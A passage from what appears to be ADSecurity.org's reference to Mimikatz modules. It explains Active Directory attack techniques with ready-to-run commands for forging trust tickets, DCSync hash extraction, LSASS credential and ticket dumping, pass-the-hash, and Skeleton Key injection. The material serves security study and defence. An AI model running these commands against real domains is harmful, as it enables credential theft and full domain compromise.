Update1/5/2016:
In early January 2015, I shared with customers indicators for detecting forged Kerberos tickets and subsequently presented this information at BSides Charm 2015. Soon after, Mimikatz was updated with a domain field that was set to static values, usually containing the string “eo.oe”. As of the Mimikatz update dated 1/5/2016, forged Kerberos tickets no longer include a domain anomaly since the netbios domain name is placed in the domain component of the Kerberos ticket.

Mimikatz code diff:
GT-DomainFieldUpdate-20150105

More information on the difficulty of detecting forged Kerberos tickets (Golden Tickets, Silver Tickets, etc) in the in the Detecting Forged Kerberos Tickets section.

 

Trust Ticket

Once the Active Directory Trust password hash is determined (Mimikatz “privilege::debug” “lsadump::trust /patch” exit), a trust ticket can be generated.
More background on Trust Tickets.

Forging Internal AD Forest Trust Tickets

In this example, Trust tickets leverage two additional tools Benjamin Delpy wrote called AskTGS and Kirbikator.

Step 1: Dumping trust passwords (trust keys)

Current Mimikatz versions can extract the trust keys (passwords).
Mimikatz “privilege::debug” “lsadump::trust /patch” exit

TrustTicket-v2-Mimikatz-DumpTrustKeys

Step 2: Create a forged trust ticket (inter-realm TGT) using Mimikatz

Forge the trust ticket which states the ticket holder is an Enterprise Admin in the AD Forest (leveraging SIDHistory, “sids”, across trusts in Mimikatz, my “contribution” to Mimikatz). This enables full administrative access from a child domain to the parent domain. Note that this account doesn’t have to exist anywhere as it is effectively a Golden Ticket across the trust.

The Mimikatz command to create a trust ticket is “kerberos::golden”

  • /domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.
  • /sid – the SID of the domain. In this example: “S-1-5-21-3677078698-724690114-1972670770”.
  • /sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1581655573-3923512380-696647894-519”. This parameter adds the provided SIDs to the SID History parameter.
  • /user – username to impersonate
  • /groups (optional) – group RIDs the user is a member of (the first is the primary group)
    default: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).
  • /ticket (optional) – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.
  • /ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.
  • /id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).
  • /startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0.
  • /endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes).
  • /renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).
  • /aes128 – the AES128 key
  • /aes256 – the AES256 key

Trust Ticket Specific Required Parameters:

  • /target – the target domain’s FQDN.
  • /service – the kerberos service running in the target domain (krbtgt).
  • /rc4 – the NTLM hash for the service kerberos service account (krbtgt).
  • /ticket – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.

Trust Ticket Default Groups:

  • Domain Users SID: S-1-5-21<DOMAINID>-513
  • Domain Admins SID: S-1-5-21<DOMAINID>-512
  • Schema Admins SID: S-1-5-21<DOMAINID>-518
  • Enterprise Admins SID: S-1-5-21<DOMAINID>-519  (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights)
  • Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520

Mimikatz “Kerberos::golden /domain:child.lab.adsecurity.org /sid:S-1-5-21-3677078698-724690114-1972670770 /sids:S-1-5-21-1581655573-3923512380-696647894-519 /rc4:49ed1653275f78846ff06de1a02386fd /user:DarthVader /service:krbtgt /target:lab.adsecurity.org /ticket:c:\temp\tickets\EA-ADSECLABCHILD.kirbi” exit

Note: Using the /sids parameter will create a trust ticket for the target AD domain that says the holder is an Enterprise Admin.

TrustTicket-v2-Mimikatz-Create-GoldenTrustTicket-ADSECLAB-DarthVader-wSIDHistory

NOTE: Mimikatz generates Silver Tickets with a hard-coded domain value which may appear in some events. It’s also likely the domain field in logon/logoff events relating to a forged ticket will have anomalies when compared to valid Kerberos authentication.

Step 3: Use the Trust Ticket file created in Step 2 to get a TGS for the targeted service in the destination domain. Save the TGS to a file.

The resulting TGS provides EA access to the parent (root) domain’s Domain Controller by targeting the CIFS service in this example (but it could target any).

Asktgs c:\temp\tickets\EA-ADSECLABCHILD.kirbi CIFS/ADSDC02.lab.adsecurity.org

TrustTicket-v2-Kekeo-AskTGS-Get-CIFS-ADSDC02-with-EA-SIDHistory

Step 4: Inject the TGS file created in Step 3 and then access the targeted service with the spoofed rights.

Kirbikator lsa c:\temp\tickets\CIFS.ADSDC02.lab.adsecurity.org.kirbi

TrustTicket-v2-Kekeo-Kibikator-Inject-CIFS-ADSDC02-with-EA-SIDHistory-ADSDC02-AdminShareAccess

 

KERBEROS::Hash – hash password to keys

KERBEROS::List List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.
Similar to functionality of “klist”.

  • /export – export user tickets to files.

Use SEKURLSA::TICKETS to dump Kerberos tickets for all authenticated users on the system.
Note that there are circumstances where the user certificates won’t export. This requires running SEKURLSA::Tickets /export (with appropriate privileges).
Mimikatz-Kerberos-Purge

KERBEROS::PTC – pass the cache (NT6)
*Nix systems like Mac OS, Linux,BSD, Unix, etc cache Kerberos credentials. This cached data can be copied off and passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files.

A good example of Mimikatz’s kerberos::ptc is when exploiting MS14-068 with PyKEK. PyKEK generates a ccache file which can be injected with Mimikatz using kerberos::ptc.

Mimikatz-PTC-PyKEK-ccacheFile

 

KERBEROS::PTT – pass the ticket
After a Kerberos ticket is found, it can be copied to another system and passed into the current session effectively simulating a logon without any communication with the Domain Controller. No special rights required.
Similar to SEKURLSA::PTH (Pass-The-Hash).

  • /filename – the ticket’s filename (can be multiple)
  • /diretory – a directory path, all .kirbi files inside will be injected.

KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2

KERBEROS::Purge – purge all Kerberos tickets
Similar to functionality of “klist purge”. Run this command before passing tickets (PTC, PTT, etc) to ensure the correct user context is used.

Mimikatz-Kerberos-Purge

KERBEROS::TGT – get current TGT for current user.

Mimikatz-Kerberos-TGT

 

LSADUMP

The LSADUMP Mimikatz Module interacts with the Windows Local Security Authority (LSA) to extract credentials. Most of these commands require either debug rights (privlege::debug) or local System. By default, the Administrators group has Debug rights. Debug still has to be “activated” by running “privilege::debug”.

 

LSADUMP:Backupkeys
Requires Administrator rights.

Mimikatz-LSADump-BackupKeys

LSADUMP::Cache – Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives)
Requires Administrator rights.

Mimikatz-LSADump-Cache

LSADUMP::DCSync – ask a DC to synchronize an object (get password data for account)
Requires membership in Domain Administrator, domain Administrators, or custom delegation.

A major feature added to Mimkatz in August 2015 is “DCSync” which effectively “impersonates” a Domain Controller and requests account password data from the targeted Domain Controller. DCSync was written by Benjamin Delpy and Vincent Le Toux. As of Mimikatz version 2.1 alpha 20160501, DCSync works with renamed domains.

The exploit method prior to DCSync was to run Mimikatz or Invoke-Mimikatz on a Domain Controller to get the KRBTGT password hash to create Golden Tickets. With Mimikatz’s DCSync and the appropriate rights, the attacker can pull the password hash, as well as previous password hashes, from a Domain Controller over the network without requiring interactive logon or copying off the Active Directory database file (ntds.dit).

Special rights are required to run DCSync. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. Note that Read-Only Domain Controllers are not only allowed to pull password data for users by default.

How DCSync works:

  1. Discovers Domain Controller in the specified domain name.
  2. Requests the Domain Controller replicate the user credentials via GetNCChanges (leveraging Directory Replication Service (DRS) Remote Protocol)

I have previously done some packet captures for Domain Controller replication and identified the intra-DC communication flow regarding how Domain Controllers replicate.

The Samba Wiki describes the DSGetNCChanges function:

“The client DC sends a DSGetNCChanges request to the server when the first one wants to get AD objects updates from the second one. The response contains a set of updates that the client has to apply to its NC replica. …
When a DC receives a DSReplicaSync Request, then for each DC that it replicates from (stored in RepsFrom data structure) it performs a replication cycle where it behaves like a client and makes DSGetNCChanges requests to that DC. So it gets up-to-date AD objects from each of the DC’s which it replicates from.”

DCSync Options:

  • /user – user id or SID of the user you want to pull the data for.
  • /domain (optional) – FQDN of the Active Directory domain. Mimikatz will discover a DC in the domain to connect to. If this parameter is not provided, Mimikatz defaults to the current domain.
  • /dc (optional) – Specify the Domain Controller you want DCSync to connect to and gather data.

There’s also a /guid parameter.

DCSync Command Examples:

Pull password data for the KRBTGT user account in the rd.adsecurity.org domain:
Mimikatz “privilege::debug” “lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt” exit

Pull password data for the Administrator user account in the rd.adsecurity.org domain:
Mimikatz “privilege::debug” “lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator” exit

Pull password data for the ADSDC03 Domain Controller computer account in the lab.adsecurity.org domain:
Mimikatz “privilege::debug” “lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$” exit

Mimikatz-LSADump-DCSync

LSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use /patch for a subset of data, use /inject for everything. Requires System or Debug rights.

  • /inject – Inject LSASS to extract credentials
  • /name – account name for target user account
  • /id – RID for target user account
  • /patch – patch LSASS.

Often service accounts are members of Domain Admins (or equivalent) or a Domain Admin was recently logged on to the computer an attacker dump credentials from. Using these credentials, an attacker can gain access to a Domain Controller and get all domain credentials, including the KRBTGT account NTLM hash which is used to create Kerberos Golden Tickets.

Command:  mimikatz lsadump::lsa /inject exit

Dumps credential data in an Active Directory domain when run on a Domain Controller.
Requires administrator access (with debug rights) or Local SYSTEM rights

The account with RID 502 is the KRBTGT account and the account with RID 500 is the default administrator for the domain.

Mimikatz-LSADump-LSA

Here’s the result when running LSADUMP::lsa /patch which only dumps the NTLM password hashes.

InvokeMimikatz-DumpADdb-KRBTGT

LSADUMP::NetSync

NetSync provides a simple way to use a DC computer account password data to impersonate a Domain Controller via a Silver Ticket and DCSync the target account’s information including the password data.

 

 

LSADUMP::Rpdata

LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts.
Requires System or Debug rights.
It contains NTLM, and sometimes LM hash, of users passwords. It can work in two modes: online (with SYSTEM user or token) or offline (with SYSTEM & SAM hives or backup).

Requires administrator access (with debug rights) or Local SYSTEM rights when run against an online SAM.

Getting an impersonated SYSTEM token: Mimikatz “PRIVILEGE::Debug” “TOKEN:elevate”

Mimikatz-LSADump-SAM

LSADUMP::Secrets – get the SysKey to decrypt SECRETS entries (from registry or hives).
Requires System or Debug rights.

Mimikatz-LSADump-Secrets

LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).
Requires System or Debug rights.

Extracts data from Active Directory for existing trust relationships for the domain. The trust key (password) is displayed as well.

Mimikatz-LSADump-Trust

 

MISC

The MISC Mimikatz module is kind of a catch-all for commands that don’t quite fit elsewhere.
The most well known commands in this module are MISC::AddSID, MISC::MemSSP, and MISC::Skeleton.

MISC::AddSid – Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID).
Requires System or Debug rights.
SneakyPersistence-AddSIDHistory-BobaFett-ADSADministratorSneakyPersistence-AddSIDHistory-GetUSerInfo-BobaFett

MISC::Cmd – Command Prompt (without DisableCMD).
Requires Administrator rights.

Mimikatz-Misc-CMD

MISC::Compressme – Compresses Mimikatz file to a new file called “mimikatz_x64.compressed”

Mimikatz-Misc-CompressMe

MISC::Detours – (experimental) Try to enumerate all modules with Detours-like hooks
Requires Administrator rights.

Mimikatz-Misc-Detours

MISC::MemSSP – Inject a malicious Windows SSP to log locally authenticated credentials by patching LSASS in memory with new SSP – no reboot required (rebooting clears the memssp Mimikatz injects). This post on Mimikatz SSP describes in-memory patching as well as more persistent SSP techniques.
Requires Administrator rights.
SneakyPersistence-EnableMimiSSP-MemSSP-01
Mandiant presentation on MemSSP

 

MISC::Ncroutemon – Juniper Manager (without DisableTaskMgr)

MISC::Regedit – Registry Editor (without DisableRegistryTools)
Requires Administrator rights.

Mimikatz-Misc-Regedit

MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller.
Requires Administrator rights.
This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password.
SneakyPersistence-EnableMimikatzSkeleton

MISC::Taskmgr – Task Manager (without DisableTaskMgr).
Requires Administrator rights.
Mimikatz-Misc-Taskmgr

MISC::Wifi – no longer in MISC. Likely moved elsewhere or removed entirely. Note there is a DPAPI:Wifi which may include similar functionality.

 

MINESWEEPER

MINESWEEPER::Infos – Provide mine info in minesweeper

 

Net

NET::User

Mimikatz-Net-User

NET::Group

NET::LocalGroup

 

PRIVILEGE

PRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz commands).
By default, the Administrators group has Debug rights. Debug still has to be “activated” by running “privilege::debug”.

The debug privilege allows someone to debug a process that they wouldn’t otherwise have access to. For example, a process running as a user with the debug privilege enabled on its token can debug a service running as local system.
http://msdn.microsoft.com/library/windows/hardware/ff541528.aspx

Mimikatz-Privilege-Debug

Benjamin’s Remark:
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 means that the required privilege is not held by the client (mostly you’re not an administrator :smirk:)

PRIVILEGE::Backup – get backup privilege/rights. Requires Debug rights.

PRIVILEGE::Driver – get driver privilege/rights. Requires Debug rights.

PRIVILEGE::ID – get privilege/rights by its ID. Requires Debug rights.

PRIVILEGE::Name – get privilege/rights by its name. Requires Debug rights.

PRIVILEGE::Restore – get restore privilege/rights. Requires Debug rights.

PRIVILEGE::Security – get security privilege/rights. Requires Debug rights.

PRIVILEGE::SysEnv – get privilege/rights to manage system environment. Requires Debug rights.

PRIVILEGE::TCB – get TCB privilege/rights(likely act as part of the operating system right). Requires elevated rights (still TBD).

 

PROCESS

The Mimikatz PROCESS module provides the ability to gather data on processes and interact with processes.

PROCESS::Exports – list exports

Mimikatz-Process-Exports

PROCESS::Imports – list imports

Mimikatz-Process-Imports

 

PROCESS::List – List running processes
Requires Administrator rights.

Mimikatz-Process-List

PROCESS::Resume – resume a process

Mimikatz-Process-Resume

PROCESS::Start – start a process

PROCESS::Stop – terminate a process

PROCESS::Suspend – suspend a process

Mimikatz-Process-Suspend

 

SEKURLSA

The SEKURLSA Mimikatz module interacts with protected memory. This module extracts passwords, keys, pin codes, tickets from the memory of lsass (Local Security Authority Subsystem Service).
In order to interact with LSASS, the Mimikatz process requires appropriate rights:

  • Administrator, to get debug privilege via “PRIVILEGE::Debug”
  • SYSTEM rights (“TOKEN::elevate”)

However, running against a dumped LSASS process file (i.e. LSASS.dmp), elevated rights are not required.

 

SEKURLSA::Backupkeys – get preferred backup master keys

Mimikatz-sekurlsa-Backupkeys

SEKURLSA::Credman – List Credentials Manager

Mimikatz-Sekurlsa-Credman

SEKURLSA::Dpapi – list cached MasterKeys

Mimikatz-Sekurlsa-DPAPI

SEKURLSA::DpapiSystem – DPAPI_SYSTEM secret

Mimikatz-Sekurlsa-DPAPISystem

SEKURLSA::Ekeys – list Kerberos encryption keys

Mimikatz-Sekurlsa-EKeys

SEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and computer account)

Mimikatz-Sekurlsa-Kerberos

SEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT)password data

Mimikatz-Sekurlsa-KrbTGT

SEKURLSA::LiveSSP – Lists LiveSSP credentials

Mimikatz-Sekurlsa-LiveSSP

SEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently logged on user and computer credentials.

  • Dumps password data in LSASS for currently logged on (or recently logged on) accounts as well as services running under the context of user credentials.
  • Account passwords are stored in memory in a reversible manner. If they are in memory (prior to Windows 8.1/Windows Server 2012 R2 they were), they are displayed. Windows 8.1/Windows Server 2012 R2 doesn’t store the account password in this manner in most cases. KB2871997 “back-ports” this security capability to  Windows 7, Windows 8, Windows Server 2008R2, and Windows Server 2012, though the computer needs additional configuration after applying KB2871997.
  • Requires administrator access (with debug rights) or Local SYSTEM rights

Windows Server 2008 R2 System (Password is shown).                                                

Mimikatz-Sekurlsa-logonpasswords-Win2008R2-Part1 

Windows Server 2012 R2 system – no cleartext password shown

Mimikatz-Sekurlsa-logonpasswords-Win2012R2

Services running with account credentials are also dumped using this command.
Note that only services that are running (credentials in memory) can be dumped in this manner.

WindowsServer2008R2-SQLServices

Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part2

Mimikatz-Sekurlsa-logonpasswords-Win2008R2-ServicePasswordDump-Part3

 

SEKURLSA::Minidump – switch to LSASS minidump process context

Note that Minidumps need to be read using the same platform it was dumped from NT5 Win32 or NT5x64 or NT6 Win32 or NT6 x64.
Mimikatz-Sekurlsa-Minidump

SEKURLSA::MSV – List LM & NTLM credentials

Mimikatz-Sekurlsa-MSV

SEKURLSA::Process – switch to LSASS process context

Mimikatz-Sekurlsa-Process

SEKURLSA::Pth – Pass-the-Hash and Over-Pass-the-Hash (aka pass the key).

Mimikatz can perform the well-known operation ‘Pass-The-Hash’ to run a process under another credentials with NTLM hash of the user’s password, instead of its real password. For this, it starts a process with a fake identity, then replaces fake information (NTLM hash of the fake password) with real information (NTLM hash of the real password).

  • /user – the username you want to impersonate, keep in mind that Administrator is not the only name for this well-known account.
  • /domain – the fully qualified domain name – without domain or in case of local user/admin, use computer or server name, workgroup or whatever.
  • /rc4 or /ntlm – optional – the RC4 key / NTLM hash of the user’s password.
  • /run – optional – the command line to run – default is: cmd to have a shell.

Mimikatz-Sekurlsa-PTH

Benjamin’s Remarks:

  • This command does not work with minidumps (nonsense);
  • it requires elevated privileges (privilege::debug or SYSTEM account), unlike ‘Pass-The-Ticket’ which uses one official API ;
    this new version of ‘Pass-The-Hash’ replaces RC4 keys of Kerberos by the ntlm hash (and/or replaces AES keys) – it permits to the Kerberos provider to ask TGT tickets! ;
  • ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable) ;
  • AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.

Benjamin’s post on overpass-the-hash.

 

SEKURLSA::SSP – Lists SSP credentials

Mimikatz-Sekurlsa-SSP

SEKURLSA::Tickets – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account.
Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).

  • /export – optional – tickets are exported in .kirbi files. They start with user’s LUID and group number (0 = TGS, 1 = client ticket(?) and 2 = TGT)

Similar to credential dumping from LSASS, using the sekurlsa module, an attacker can get all Kerberos ticket data in memory on a system, including those belonging to an admin or service.
This is extremely useful if an attacker has compromised a web server configured for Kerberos delegation that users access with a backend SQL server. This enables an attacker to capture and reuse all user tickets in memory on that server.

The “kerberos::tickets” mimikatz command dumps the current logged-on user’s Kerberos tickets and does not require elevated rights. Leveraging the sekurlsa module’s capability to read from protected memory (LSASS), all Kerberos tickets on the system can be dumped.

Command:  mimikatz sekurlsa::tickets exit

  • Dumps all authenticated Kerberos tickets on a system.
  • Requires administrator access (with debug) or Local SYSTEM rights

The following screenshot shows dumped password and Kerberos tickets (TGS & TGT) of another user who is a Domain Admin (LukeSkywalker).

Mimikatz-SekurlsaTicketsMimikatz-SekurlsaTickets-Part2-AdminTGT

The following screenshot shows dumped credentials and Kerberos tickets (TGS & TGT) of another admin (HanSolo).

Mimikatz-SekurlsaTickets-Part3-AdminTGT

The following screenshot shows dumped credentials and Kerberos tickets (TGS & TGT) for a SQL service account (svc-SQLDBEngine01).

Mimikatz-SekurlsaTickets-Part4-ServiceTGT

 

SEKURLSA::Trust – get trust keys
(I think this is deprecated in favor of lsadump::trust /patch)

 

SEKURLSA::TSPKG – Lists TsPkg credentials

Mimikatz-Sekurlsa-TSPKG

SEKURLSA::Wdiget – List WDigest credentials

Mimikatz-sekurlsa-wdigest

SERVICE

SERVICE::List – list services

SERVICE::Preshutdown – preshutdown service

SERVICE::Remove – Remove service

SERVICE::Resume – resume service

SERVICE::Shutdown – shutdown service

SERVICE::Start – Start a service

SERVICE::Stop – Stop service

SERVICE::Suspend – suspend service

 

SID

The Mimikatz SID module replaces MISC::AddSID. Use SID::Patch to patch the ntds service.

SID::lookup – Name (/name) or SID (/sid) lookup

Mimikatz-SID-Lookup

SID::modify – Modify object SID of an object

Mimikatz-SID-Modify

SID::query – Query object by SID or name

Mimikatz-SID-query

SID::add – Add a SID to SIDHistory of an object

Mimikatz-SID-add

SID::clear – Clear SIDHistory of an object

Mimikatz-SID-clear-query

SID::patch – Patch NTDS service

Mimikatz-SID-Patch

 

STANDARD

STANDARD::Base64 – switch output to base64 output

STANDARD::CD – change or display current directory

STANDARD::CLS – Clear screen

STANDARD::Coffee – show an ASCII image of coffee 🙂

STANDARD::Exit– quit Mimikatz

STANDARD::Log – send Mimikatz data to log file

STANDARD::MarkRus– Pass-the-Hash information. 😉

STANDARD::Sleep – sleep an amount of milliseconds

STANDARD::Version – display version information

 

SYSENV

The Mimikatz SYSENV module provides the ability to manage system environment variables.

SYSENV::List
SYSENV::Get
SYSENV::Set
SYSENV::Del

 

TOKEN

The Mimikatz Token module enables Mimikatz to interact with Windows authentication tokens, including grabbing and impersonating existing tokens.

TOKEN::Elevate – impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box using the Windows API.
Requires Administrator rights.

Mimikatz-Token-Elevate1

Find a domain admin credential on the box and use that token: token::elevate /domainadmin

Mimikatz-Token-Elevate-DomainAdmin

 

TOKEN::List – list all tokens of the system

Mimikatz-Token-List

TOKEN::Revert – revert to process token

Mimikatz-Token-Whoami

TOKEN::Whoami – Display current identity

 

 

TS

TS::Multirdp – (experimental) Patch Terminal Server service to allow multiple users

Mimikatz-TS-MultiRDP

VAULT

VAULT::List – list vault credentials

Mimikatz-Vault-List

VAULT::Cred – cred

 

Mimikatz Version History

Sourced from Mimikatz release Github page

Mimikatz Release Date: 6/06/2016
2.1 alpha 20160506.1 (oe.eo) edition
[remove] mimikatz lsadump::dcsync req v10 & rep v9
[future fix] mimikatz lsadump::dcsync pDrsExtensionsInt->dwExtCaps = MAXDWORD32

Mimikatz Release Date: 6/06/2016
2.1 alpha 20160606 (oe.eo) edition
[fix #47] mimikatz lsadump::dcsync ‘Fun with flags’ to support AD Privileged Access Management in 2016 TP5 (req v10 & rep v9)

Mimikatz Release Date: 6/04/2016
2.1 alpha 20160604 (oe.eo) edition
[fix #46] MSV structure alignment for Windows 10 > LTSB (LSAISo & normal)
[enhancement] SID/Name lookup & LDAP query now with system arg (not only local/current domain)

Mimikatz Release Date: 6/01/2016
2.1 alpha 20160601 (oe.eo) edition
[fix] mimikatz lsadump::dcsync now supports AD with recycle bin enabled (thanks to Marcus Rath for report)

Mimikatz Release Date: 5/25/2016
2.1 alpha 20160525 (oe.eo) edition
lsadump::netsync to ask a DC to send current and previous NTLM hash of DC/SRV/WKS
Lots of thanks to @asolino for his help!

Mimikatz Release Date: 5/22/2016
2.1 alpha 20160522 (oe.eo) edition
[fix #39] Removing 2 bytes of alignment when using LSAIso with MSV

Mimikatz Release Date: 5/06/2016
2.1 alpha 20160506 (oe.eo) edition
[fix #36] Replace wcsicmp by _wcsicmp to avoid warnings with moderns VS
New SID module
[remove] misc::addsid
[new] sid:: module, to lookup, query, modify, add… (2003/2008r2/2012r2 right now)

Mimikatz Release Date: 4/30/2016
2.1 alpha 20160501 (oe.eo) edition
[close #35] DCSync works with renamed domains
Thanks to @rmbolger & @MichaelGrafnetter, DCSync now deals with msDS-ReplicationEpoch / dwReplEpoch

Mimikatz Release Date: 3/27/2016
2.1 alpha 20160327 (oe.eo) edition
Welcome to Windows 10 LTSB & current
[remove] mimidrv & mimikatz kernel module: Process & Object callbacks remover are not anymore in the program
[internal] Windows 10 is now splitted in 1507 (LTSB) and 1511 (current)
[internal] mimidrv: Windows 10 support added
[internal] mimilib WinDBG module & mimikatz::sekurlsa: Windows 10 MSV / Kerberos Tickets are not specific anymore (offsets table)
[internal] Using KULL_M_MEMORY_GLOBAL_OWN_HANDLE instead of local variable in each function

Mimikatz Release Date: 2/29/2016
2.1 alpha 20160229 (oe.eo) edition
System Environment Variables & other stuff
[new] System Environment Variables user module
[new] System Environment Variables kernel IOCTL for Set
[enhancement] privilege::sysenv
[enhancement] Busylight
[enhancement] misc::skeleton can avoid anti-AES patching for aware clients with /letaes

Mimikatz Release Date: 2/17/2016
2.1 alpha 20160217 (oe.eo) edition
[new] crypto::certificates /silent & /nokey flags
[new] crypto::keys /silent flag
[new] kull_m_busylight module now support protocol for new devices

Mimikatz Release Date: 2/07/2016
Some DPAPI stuff
[new] vault module now handles more Vault types, Attributes and Properties (with /attributes)
[new] misc::compressme to create a compressed version of mimikatz
[new] dpapi::cred now handles legacy (NT5) multiple credentials
[new] dpapi::wifi & dpapi::wwan to deal with network profiles
[internal] kuhl_m_vault: vault::list now deals with SID / credentials attributes (with one incorrect align.)
[internal] kull_m_string: removed unused kull_m_string_suspectUnicodeStringStructure
[internal] kull_m_string: added kull_m_string_printSuspectUnicodeString
[internal] kull_m_string: added dirty kull_m_string_quickxml_simplefind
[internal] kull_m_memory: quick compress & decompress routines
[internal] kull_m_dpapi: added blob flags descriptions
[internal] kull_m_dpapi: fixed blob protection flags description for system
[internal] kull_m_dpapi: removed unused kull_m_dpapi_unprotect_backupkey_with_secret
[internal] kull_m_cred: added legacy (NT5) credentials structures & routines

Mimikatz Release Date: 1/31/2016
Lots of internals and 2003 SP1 support
[new] sekurlsa module and its kerberos submodule now work with old 2003 SP1 (live or dump)
[remove] misc::wifi with WLanAPI will be replaced with dpapi::wifi raw access
[fix] crypto::certificate buffer free at the right place
[internal] new kull_m_file Find function with callback
[internal] removed kull_m_file functions (read/write/file exist) with environment-variables, now used for all command-lines
[internal] kull_m_crypto_hash better checks for CRC32 trick
[internal] mimilove for Windows 2000 banner update
[internal] crypto::system now works with buffers (for future registry access)
[internal] kerberos::ptt & crypto::system call kull_m_file_Find instead of their own implementation
[internal] remove CrtlHandler, from mimikatz main modules, when exiting to let PowerShell clean
[internal] expand command lines environment-variables from mimikatz main modules

Mimikatz Release Date: 1/16/2016
Crypto, crypto everywhere…
[new] crypto::providers and crypto::certificates now list provider types
[internal] Removed kull_m_crypto_crc32 routine from crypto module, relies now on cryptdll using CALG_CRC32 with kull_m_crypto_hash
[internal] Removed incorrect usage of BOOL instead of NTSTATUS in kuhl_m_pac_validationInfo_to_PAC

Mimikatz Release Date: 1/11/2016
Crypto & Kerberos enhancements
[fix] dpapi::capi now deals with AT_SIGNATURE keys
[fix] sekurlsa::kerberos / kerberos:: encryption type are now signed
[new] kerberos::ask to ask / save TGS from current TGT
[new] crypto::system to describe/to export Windows System Certificate (cert, crl, ctl, keyid)
[internal] smaller banner for smaller displays
[internal] Copyrights for 2016
[internal] kull_m_file can deal with environment-variable strings in paths
[internal] kull_m_crypto new types for CERT_PROP_*_ID.

Mimikatz Release Date: 1/05/2016
MSV & Kerberos fixes, LSA and Privilege enhancements
[fix] sekurlsa::msv & mimilib for Windows 10 build 10586
[fix #20] sekurlsa::tickets (display & export) for NT 6 != Windows 10
[close #16] kerberos::golden now with ~NetBios name in LogonDomainName field of the PAC
[new] privilege module shortcuts (driver, security, tcb, backup, restore) and functions (by id or name)
[new] lsadump::dcsync and lsadump::lsa /inject ‘NTLM-Strong-NTOWF’ in Supplemental Credentials structures (Windows 2016 TP 4)
[internal] NtSetSystemInformation can now be used in code

Mimikatz Release Date: 11/12/2015
mimikatz & mimilib sekurlsa module ready for Windows 10 build 10586

Mimikatz Release Date: 11/09/2015
mimikatz: updated to build with hid.lib

Mimikatz Release Date: 10/08/2015
Kiwi & René Coty BusyLight mode

Mimikatz Release Date: 10/04/2015
mimikatz + mimilib sekurlsa fix for SmartCard informations

Mimikatz Release Date: 9/29/2015
sekurlsa::kerberos – Fix SmartCard pin code

Mimikatz Release Date: 9/26/2015
sekurlsa::pth Auto-impersonation (/impersonate)

Mimikatz Release Date: 9/16/2015
lsadump::dcsync fix for with 2012r2 AD Recycle Bin
Thank you to @asolino, @mubix & @carnal0wnage !

Mimikatz Release Date: 9/06/2015
Enhancements
* Code cleaning

Mimikatz Release Date: 9/01/2015
kerberos::golden : fix for groups printing.
lsadump::dcsync autoselect a domain controller with Directory Service
(DIRECTORY_SERVICE)

Mimikatz Release Date: 8/30/2015
Cleaning & few Win10 adaptations

Mimikatz Release Date: 8/25/2015
Licence fix on one missed file by AnkhSVN 😉
Global licence update, credits to Vincent LE TOUX for DCSync, and lsadump::hash moved to crypto::hash

 

 

This page and all content Copyright © 2015-2016 Sean Metcalf (ADSecurity.org). All Rights Reserved. No warranty is implied or provided.

 

(Visited 76,573 times, 137 visits today)